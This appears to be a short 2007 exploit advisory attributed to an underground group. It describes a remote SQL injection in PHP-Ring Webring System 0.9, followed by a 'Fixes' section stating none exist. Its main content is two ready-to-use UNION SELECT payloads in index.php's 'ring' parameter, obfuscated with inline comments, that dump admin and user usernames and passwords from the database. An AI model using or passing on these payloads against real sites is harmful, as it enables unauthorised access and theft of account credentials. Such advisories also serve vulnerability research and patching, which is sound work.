PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability

2007-04-22 00:00:00

Y! Underground Group
http://2600.ir



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......: uPHP_ring_website
Download.....: http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........: Sql Injection Attack
Author.......: Dj7xpl / [email protected]
HomePage.....: http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

#

Fixes

No fixes

In order to submit a new fix you need to be registered.